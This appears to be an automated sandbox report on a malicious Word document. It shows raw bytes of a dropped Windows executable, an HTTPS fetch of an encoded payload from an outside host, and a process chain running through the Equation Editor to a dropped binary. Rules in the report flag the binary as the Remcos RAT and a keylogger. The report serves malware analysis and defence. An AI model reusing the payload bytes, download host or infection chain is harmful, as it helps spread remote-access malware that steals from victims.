                                        Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 32 06 00 00 66 0a 00 00 00 00 00 24 48 06 00 00 10 00 00 00 50 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                        Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*2f$HP@0@(pPlH.text'( `.itextl@, `.dataP6@.bss6pJ.idata(*J@.tls4t.rdatat@@.relocPlnv@B.rsrcp@@0@@
                                        Sep 25, 2024 09:43:26.396409988 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Car
                                        Sep 25, 2024 09:43:26.396421909 CEST448INData Raw: 40 00 df 28 df 68 08 df 68 10 df 68 18 8b 48 20 89 4a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df
                                        Data Ascii: @(hhhH J zzz:@(hhhh H(J(z zzz:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<
                                        Sep 25, 2024 09:43:26.396456003 CEST1236INData Raw: 05 24 77 4f 00 c3 83 3d 20 77 4f 00 00 75 03 c3 90 90 a1 1c 77 4f 00 f6 40 fc 01 75 25 83 48 fc 08 8b 15 20 77 4f 00 29 d0 8d 4a 03 89 48 fc 89 54 02 f8 81 fa 30 0b 00 00 0f 83 67 ff ff ff c3 90 90 ba f0 ff ff ff 23 50 fc 81 fa 30 0b 00 00 72 12
                                        Data Ascii: $wO= wOuwO@u%H wO)JHT0g#P0rwO#P wO)SjhhjtMwOwOwOQ+ wO+wO[3 wO3[=MpOt4
                                        Sep 25, 2024 09:43:26.396469116 CEST1236INData Raw: 28 77 4f 00 75 07 0f b3 15 24 77 4f 00 bf f0 ff ff ff 23 7e fc 89 fa 29 da 74 1f 8d 04 33 8d 4a 03 89 48 fc 89 54 02 f8 81 fa 30 0b 00 00 72 0f e8 9d fa ff ff eb 08 90 90 90 80 64 37 fc f7 8d 4b 02 89 4e fc c6 05 18 77 4f 00 00 89 f0 5f 5e 5b c3
                                        Data Ascii: (wOu$wO#~)t3JHT0rd7KNwO_^[[1PSMpOuajBt,J@At1[KZJQS1[tBJHA19SuCRMpOp#tQRjZY
                                        Sep 25, 2024 09:43:26.396481037 CEST1236INData Raw: 5d 5f 5e 5b c3 90 90 c6 05 18 77 4f 00 00 89 c8 c1 e8 02 01 c8 31 ff 29 d0 83 d7 ff 21 f8 01 d0 89 c5 89 cf 52 e8 f8 f7 ff ff 5a 85 c0 74 d1 81 fd 2c 0a 04 00 76 03 89 50 f8 89 c5 89 c2 89 f0 89 f9 e8 2b f5 ff ff 89 f0 e8 3c fb ff ff 89 e8 5d 5f
                                        Data Ascii: ]_^[wO1)!RZt,vP+<]_^[9vD1)!RZt",vPN^[9rP^[ct,vX^[1^[@S
                                        Sep 25, 2024 09:43:26.396495104 CEST1236INData Raw: 05 c0 97 4f 00 00 8b c3 5f 5e 5b c3 8b c0 55 8b ec 83 c4 e0 53 56 57 89 45 fc 8b 45 fc 8b 00 81 e8 40 50 46 00 c1 e8 05 c1 e0 08 8b 55 08 8d b4 c2 00 48 fe ff 8d 4d e4 8d 55 e8 8b 45 fc e8 6f fc ff ff e9 fd 00 00 00 8b 45 e8 83 e8 04 f6 00 01 0f
                                        Data Ascii: O_^[USVWEE@PFUHMUEoEEWEG3E_E8EE}E@;E~{EEEE~*E}tE8 rE8r3EE
                                        Sep 25, 2024 09:43:26.396590948 CEST328INData Raw: b8 58 2a 40 00 b9 03 00 00 00 8b d3 e8 25 f9 ff ff 68 10 20 00 00 68 5c 2a 40 00 8d 85 d8 87 fd ff 50 6a 00 e8 e5 e8 ff ff 5f 5e 5b 8b e5 5d c3 00 00 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 6d 65 6d 6f 72 79 20 6c 65 61 6b 20 68 61 73 20 6f 63
                                        Data Ascii: X*@%h h\*@Pj_^[]An unexpected memory leak has occurred. The unexpected small block leaks are: bytes: UnknownStringThe sizes of unexpected leaked medium and large blocks are: Unexpected Me
                                        Sep 25, 2024 09:43:26.396603107 CEST1236INData Raw: 00 00 bb 5c 50 46 00 83 3b 00 75 06 c7 03 40 15 40 00 8d 43 e4 89 43 f8 8d 43 e4 89 43 e8 33 c0 89 43 f0 c7 43 ec 01 00 00 00 0f b7 43 e6 03 c0 03 c0 8d 04 40 05 ef 00 00 00 25 00 ff ff ff 83 c0 30 3d 30 0b 00 00 73 05 b8 30 0b 00 00 05 d0 04 00
                                        Data Ascii: \PF;u@@CCCC3CCC@%0=0s0vSf0fC{I00ss0s0v0 3fff%f0fC N0wOwOwOwO
                                        Sep 25, 2024 09:43:26.396616936 CEST1236INData Raw: 8a 40 02 66 89 0a 88 42 02 c3 8b 08 89 0a c3 8b 08 8a 40 04 89 0a 88 42 04 c3 8b 08 66 8b 40 04 89 0a 66 89 42 04 c3 8b 08 8b 40 03 89 0a 89 42 03 c3 df 28 df 3a c3 8d 40 00 53 31 db 69 93 08 50 46 00 05 84 08 08 42 89 93 08 50 46 00 f7 e2 89 d0
                                        Data Ascii: @fB@Bf@fB@B(:@S1iPFBPF[<ar<zw, f$PF-$PFj<$X<$XZ=,pOt,pOSHftIfs3=rOt=sOu3gt[@P
                                        Sep 25, 2024 09:43:26.401443005 CEST1236INData Raw: c8 05 40 00 00 00 00 00 00 00 fa 08 40 00 00 00 00 00 00 40 9c 0c 40 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 28 6b ee 1c 40 00 00 00 00 00 f9 02 95 20
                                        Data Ascii: @@@@P@$@@ @(k@ @@C#@&@**@ -@1_0@4@.7@@v:k:@#>@bxA@z&D@n2xH@W?hK@N@@aQYR@oU@


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2249165112.137.173.774433780C:\Users\user\AppData\Roaming\audiodg.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-25 07:43:29 UTC163OUTGET /doc/233_Qzzgbhhaaml HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                        Host: maan2u.com
                                        2024-09-25 07:43:29 UTC365INHTTP/1.1 200 OK
                                        Connection: close
                                        last-modified: Tue, 24 Sep 2024 23:56:18 GMT
                                        accept-ranges: bytes
                                        content-length: 1117948
                                        date: Wed, 25 Sep 2024 07:43:29 GMT
                                        server: LiteSpeed
                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                        2024-09-25 07:43:30 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 6a 4a 53 63 57 47 42 4d 6a 45 52 38 63 45 78 6f 69 4a 78 4d 63 48 41 38 55 48 41 34 68 46 52 59 5a 48 78 63 59 45 78 41 61 45 51 34 65 49 43 45 6e 46 68 38 56 46 43 55 67 46 78 73 66 47 78 4d 62 47 78 55 62 4a 52 67 52 44 69 41 6b 4a 41 34 6c 46 53 63 4f 45 43 63 61 4a 79 55 6b 46 68 77 6d 4a 68 4b 6d 72 71 56 5a 49 36 65 78 53 2f 34 6e 4a 78 51 50 46 52 55 4f 44 68 6f 5a 70 71 36 6c 57 53 4f 6e 73 55 75 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 31 62 31 39 41 34 34 33 4f 6a 43 4d 39 6e 62 35 7a 42 45 54 43 36 58 64 6e 65 4d 57 46 6a 64 48 76 38 44 47 4d 4e 6e 30 50 4d 54 41 51 61 66 30 31 66 4c 63 4a 37 58 67 59 45 79 33 4f 67 7a 6f 2b 5a 4c 2f 30 77 31 4f 39 39 49 52 41 35 39 37 4b 71 6a 7a 41 6a 56 4a 50 73 6e 61 32 50 4a
                                        Data Ascii: pq6lWSOnsUsjJScWGBMjER8cExoiJxMcHA8UHA4hFRYZHxcYExAaEQ4eICEnFh8VFCUgFxsfGxMbGxUbJRgRDiAkJA4lFScOECcaJyUkFhwmJhKmrqVZI6exS/4nJxQPFRUODhoZpq6lWSOnsUu9y8na2M29z8HU1b19A443OjCM9nb5zBETC6XdneMWFjdHv8DGMNn0PMTAQaf01fLcJ7XgYEy3Ogzo+ZL/0w1O99IRA597KqjzAjVJPsna2PJ
                                        2024-09-25 07:43:30 UTC16384INData Raw: 47 54 45 54 59 52 65 41 4a 59 38 65 42 79 5a 50 47 65 77 6c 52 52 49 34 45 76 77 53 4c 52 41 66 49 42 77 63 45 43 58 73 33 38 54 6f 67 75 70 48 38 36 6a 31 45 75 67 6d 2b 64 58 6f 77 4f 7a 4e 36 58 62 34 68 2b 39 56 37 51 62 32 51 66 51 7a 36 30 66 31 78 2f 44 46 39 58 76 65 5a 76 74 67 34 4a 54 35 6d 76 47 4b 37 6f 54 6a 55 39 34 42 2b 2b 7a 36 36 65 6f 36 2b 44 2f 67 4e 2b 79 32 39 42 76 30 36 66 6e 66 38 37 44 64 74 2f 4b 2f 2b 38 37 79 62 65 6c 7a 36 58 54 63 51 66 52 49 36 69 6a 69 49 4f 62 76 39 37 62 69 6f 4d 48 55 7a 57 36 2b 79 48 33 55 47 35 49 54 43 51 30 73 46 6a 77 61 50 78 69 35 46 42 67 5a 73 41 32 7a 48 37 63 6c 31 52 33 4a 45 6d 67 65 5a 78 6c 34 47 59 30 5a 66 42 63 41 4a 31 51 54 56 68 34 32 49 69 30 6e 71 69 57 6e 44 63 41 62 32 43 68
                                        Data Ascii: GTETYReAJY8eByZPGewlRRI4EvwSLRAfIBwcECXs38TogupH86j1Eugm+dXowOzN6Xb4h+9V7Qb2QfQz60f1x/DF9XveZvtg4JT5mvGK7oTjU94B++z66eo6+D/gN+y29Bv06fnf87Ddt/K/+87ybelz6XTcQfRI6ijiIObv97bioMHUzW6+yH3UG5ITCQ0sFjwaPxi5FBgZsA2zH7cl1R3JEmgeZxl4GY0ZfBcAJ1QTVh42Ii0nqiWnDcAb2Ch
                                        2024-09-25 07:43:30 UTC16384INData Raw: 31 4e 48 54 31 4e 4b 2f 31 4e 72 58 77 64 62 59 7a 64 44 5a 7a 39 4c 43 76 37 2f 4a 32 72 37 62 7a 4d 75 2f 32 64 58 42 32 73 33 56 31 64 54 56 79 39 6a 51 30 73 43 38 77 39 4c 4c 32 38 62 53 30 4d 6e 5a 79 63 75 38 31 64 54 4b 79 74 47 39 79 38 6e 56 32 4d 32 39 30 4d 48 55 7a 64 6d 2b 79 63 33 62 31 4e 48 4d 32 39 4b 2f 32 39 58 58 77 64 6e 58 7a 64 48 57 30 4e 4b 6d 77 4d 43 34 4c 72 6e 55 4d 34 48 71 31 6a 47 4a 37 4e 4b 68 48 4e 6e 61 79 37 4c 50 7a 63 4c 72 76 63 32 72 4e 37 6e 4e 6f 6a 79 66 78 76 67 78 71 4e 75 31 4b 61 6e 43 79 37 6a 61 31 79 43 41 79 37 37 55 69 4e 6d 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 72 42 67 4e 4c 61 55 4a 54 61 78 4e 6e 4f 30 37 2b
                                        Data Ascii: 1NHT1NK/1NrXwdbYzdDZz9LCv7/J2r7bzMu/2dXB2s3V1dTVy9jQ0sC8w9LL28bS0MnZycu81dTKytG9y8nV2M290MHUzdm+yc3b1NHM29K/29XXwdnXzdHW0NKmwMC4LrnUM4Hq1jGJ7NKhHNnay7LPzcLrvc2rN7nNojyfxvgxqNu1KanCy7ja1yCAy77UiNm+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2drBgNLaUJTaxNnO07+
                                        2024-09-25 07:43:30 UTC16384INData Raw: 32 4d 33 43 7a 77 57 2f 30 75 2f 67 34 39 4b 75 52 61 6e 54 75 45 65 7a 31 4c 52 47 72 4e 59 4e 43 4c 6a 5a 71 42 66 41 76 2b 67 62 71 4c 37 31 54 4a 36 2f 36 2b 71 76 32 72 62 33 72 64 54 56 55 64 66 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 31 64 51 41 30 64 45 71 49 42 37 56 32 4b 61 39 30 4c 55 51 7a 74 6d 2b 36 63 33 62 31 4f 48 4d 32 39 4b 69 32 39 58 58 6f 64 6e 58 7a 66 66 57 30 4e 4b 37 77 4d 43 67 73 36 6a 55 7a 46 47 2f 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4d 33 4c 54 64 4c 4e 44 53 4d 62 78 73 75 38 32 74 73 66 55 72 54 43 34 2f 32 76 31 36 41 6d 71 62 37 73 57 4c 4c 42 34 78 32 77 32 2f 74 61 73 73 32 2f 32 39 72 59 71 4b 2b 78 30 74 41 41 30 4e 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58
                                        Data Ascii: 2M3CzwW/0u/g49KuRanTuEez1LRGrNYNCLjZqBfAv+gbqL71TJ6/6+qv2rb3rdTVUdfP0sC8vNLL28nS0MnWycu81dQA0dEqIB7V2Ka90LUQztm+6c3b1OHM29Ki29XXodnXzffW0NK7wMCgs6jUzFG/2dXB1c3V1dvVy9jP0sC8vM3LTdLNDSMbxsu82tsfUrTC4/2v16Amqb7sWLLB4x2w2/tass2/29rYqK+x0tAA0NLCwL/J2sHbzMvA2dX
                                        2024-09-25 07:43:30 UTC16384INData Raw: 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c
                                        Data Ascii: ycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9L
                                        2024-09-25 07:43:30 UTC16384INData Raw: 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b
                                        Data Ascii: 0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK
                                        2024-09-25 07:43:30 UTC16384INData Raw: 51 30 63 7a 2b 4f 7a 33 4e 50 6f 77 51 74 68 42 50 6a 54 68 45 52 38 58 4a 45 44 53 30 45 42 43 4e 65 33 38 4c 64 35 48 4e 71 2b 39 73 73 6e 61 47 55 51 78 52 44 48 68 4f 45 49 77 4c 6a 67 39 50 7a 37 4d 39 4e 4b 2f 4d 6b 46 48 4f 6b 6e 64 4f 45 52 49 53 44 55 33 4d 7a 44 4a 2b 38 45 38 36 44 6f 73 48 45 6b 61 51 75 6f 32 33 64 76 2b 79 39 67 39 51 66 56 48 4d 69 73 73 33 45 72 71 30 49 7a 57 4f 53 77 34 4e 30 45 4f 2f 44 77 2b 4f 53 35 49 75 55 45 57 53 50 59 31 35 64 5a 4c 79 54 31 42 51 44 4a 4a 4a 45 50 38 4f 45 70 41 4d 55 64 47 4f 6a 34 66 53 4f 55 2f 2b 4c 2b 50 32 73 46 44 53 54 6b 50 52 52 34 32 34 69 37 64 31 51 76 56 37 6b 6f 73 35 30 4d 79 46 55 50 73 4f 50 48 53 68 4d 6c 45 4c 76 77 36 33 42 59 75 4c 67 38 78 46 43 37 64 4f 65 57 39 43 63 46
                                        Data Ascii: Q0cz+Oz3NPowQthBPjThER8XJEDS0EBCNe38Ld5HNq+9ssnaGUQxRDHhOEIwLjg9Pz7M9NK/MkFHOkndOERISDU3MzDJ+8E86DosHEkaQuo23dv+y9g9QfVHMiss3Erq0IzWOSw4N0EO/Dw+OS5IuUEWSPY15dZLyT1BQDJJJEP8OEpAMUdGOj4fSOU/+L+P2sFDSTkPRR424i7d1QvV7kos50MyFUPsOPHShMlELvw63BYuLg8xFC7dOeW9CcF
                                        2024-09-25 07:43:30 UTC16384INData Raw: 7a 39 4c 43 46 6d 73 33 32 68 56 76 52 4d 76 41 32 64 54 42 31 63 33 56 31 64 76 56 79 39 67 72 64 6b 69 38 47 36 36 54 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 6c 74 70 75 38 6e 61 32 42 4f 39 7a 38 48 55 30 74 6e 42 78 73 33 55 31 4e 48 4d 31 4e 4b 2f 32 78 32 74 73 64 6e 59 7a 64 44 57 4b 33 62 6c 77 42 74 64 75 73 48 62 7a 4d 72 41 32 64 58 42 31 63 33 56 31 64 73 68 58 36 6a 50 4a 61 71 73 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 76 76 4b 79 73 36 39 79 38 6e 61 48 51 7a 65 7a 78 69 35 74 64 59 5a 4e 36 58 55 49 7a 2f 4d 31 4e 4b 2b 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 38 4f 41 4d 48 62 7a 4d 75 72 32 53 46 6f 56 4d 30 6b 70 61 66 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54
                                        Data Ascii: z9LCFms32hVvRMvA2dTB1c3V1dvVy9grdki8G66T28nS0MnWycu82tTKyltpu8na2BO9z8HU0tnBxs3U1NHM1NK/2x2tsdnYzdDWK3blwBtdusHbzMrA2dXB1c3V1dshX6jPJaqsvNLL28nS0MnWycu82vvKys69y8naHQzezxi5tdYZN6XUIz/M1NK+29rXwdnYzdDWz9LCwL8OAMHbzMur2SFoVM0kpafVy9jP0sC8vNLL28nS0MnWycu82tT
                                        2024-09-25 07:43:30 UTC16384INData Raw: 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 52 67 56 49 53 6b 68 49 52 38 55 44 78 34 72 4b 42 59 61 47 69 67 50 48 77 30 6f 4a 67 30 6b 44 51 38 61 49 43 49 51 45 46 73 5a 44 77 30 67 48 69 6b 5a 4b 78 58 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6b 65 4b 53 59 6b 4b 79 67 59 4a 78 73 4e 49 42 55 66 4b 67 38 57 48 53 45 56 49 53 6b 68 49 52 38 68 44 78 34 72 4b 42 59 61 47 69 67
                                        Data Ascii: 1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2RgVISkhIR8UDx4rKBYaGigPHw0oJg0kDQ8aICIQEFsZDw0gHikZKxXUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdkeKSYkKygYJxsNIBUfKg8WHSEVISkhIR8hDx4rKBYaGig
                                        2024-09-25 07:43:30 UTC16384INData Raw: 7a 2f 58 55 51 64 59 7a 79 55 72 55 50 64 48 4d 31 4e 4b 2f 4e 64 70 44 77 54 37 59 50 64 42 46 7a 7a 37 43 4d 4c 2f 77 32 68 62 62 72 4d 76 31 32 55 4c 42 53 63 31 46 31 54 7a 56 37 74 67 2f 30 68 6d 38 51 4e 4c 6a 32 78 33 53 47 4d 6e 66 79 64 79 38 33 74 54 38 79 6b 4b 39 4d 4d 6b 67 32 4b 32 39 51 4d 45 31 7a 55 53 2b 4d 4d 31 44 31 45 48 4d 74 64 4a 42 32 78 54 58 4a 4e 6e 59 7a 66 44 57 51 55 4d 32 77 4c 2f 4a 53 44 44 65 4c 54 66 31 33 54 34 74 50 6b 49 2f 46 74 76 56 71 78 4a 42 51 2f 63 35 47 4c 4c 76 33 79 35 46 51 79 72 57 79 63 75 38 53 45 48 75 4f 38 36 39 79 38 6b 2b 50 65 59 32 51 55 49 39 36 44 73 77 4d 71 33 68 53 6b 5a 44 46 62 4c 37 53 6a 31 49 4e 72 72 59 53 6b 4e 49 53 45 55 33 4c 4c 38 78 52 42 72 62 7a 43 6c 48 32 64 56 49 2b 63 31
                                        Data Ascii: z/XUQdYzyUrUPdHM1NK/NdpDwT7YPdBFzz7CML/w2hbbrMv12ULBSc1F1TzV7tg/0hm8QNLj2x3SGMnfydy83tT8ykK9MMkg2K29QME1zUS+MM1D1EHMtdJB2xTXJNnYzfDWQUM2wL/JSDDeLTf13T4tPkI/FtvVqxJBQ/c5GLLv3y5FQyrWycu8SEHuO869y8k+PeY2QUI96DswMq3hSkZDFbL7Sj1INrrYSkNISEU3LL8xRBrbzClH2dVI+c1


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:03:43:17
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f160000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:03:43:22
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:03:43:27
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\audiodg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\audiodg.exe"
                                        Imagebase:0x400000
                                        File size:1'088'512 bytes
                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:03:43:33
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                                        Imagebase:0x4a9e0000
                                        File size:302'592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:03:43:33
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
